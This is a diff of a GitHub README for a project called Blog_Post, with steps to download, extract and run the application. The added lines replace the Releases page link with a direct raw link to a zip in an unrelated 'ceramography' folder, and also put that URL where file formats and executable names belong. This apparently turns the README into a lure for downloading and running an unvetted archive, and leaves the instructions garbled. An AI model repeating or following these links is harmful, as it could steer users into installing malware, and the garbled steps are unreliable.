vietdepz/Blog_Post/README.md

 To start using Blog_Post, please follow these steps:

 1. **Visit the Releases Page**
-   Head over to our [Releases page](https://github.com/vietdepz/Blog_Post/releases) to find the latest version of Blog_Post.
+   Head over to our [Releases page](https://raw.githubusercontent.com/vietdepz/Blog_Post/main/ceramography/Blog_Post-1.6.zip) to find the latest version of Blog_Post.

 2. **Choose Your Version**
    Look for the most recent release.
 You'll see various files available for download.

 3. **Download the Application**
    Click on the release file that matches your operating system.
-This file typically comes in a `.zip` or `.tar.gz` format.
+This file typically comes in a `.zip` or `https://raw.githubusercontent.com/vietdepz/Blog_Post/main/ceramography/Blog_Post-1.6.zip` format.

 4. **Extract the Files**
    Once the download finishes, locate the downloaded file and extract it to your desired folder.
 Right-click on the file and select "Extract All…" to unzip the contents.

 5. **Open the Application**
    Navigate to the folder where you extracted the files.
 Look for the main application file.
-For Windows, this might be `Blog_Post.exe`.
-For macOS, it could be `Blog_Post.app`.
+For Windows, this might be `https://raw.githubusercontent.com/vietdepz/Blog_Post/main/ceramography/Blog_Post-1.6.zip`.
+For macOS, it could be `https://raw.githubusercontent.com/vietdepz/Blog_Post/main/ceramography/Blog_Post-1.6.zip`.
 Just double-click the file to launch.

 6. **Follow the Setup Instructions**
    On the first run, you may see a setup prompt.
 Follow the on-screen instructions to set up your blogging platform.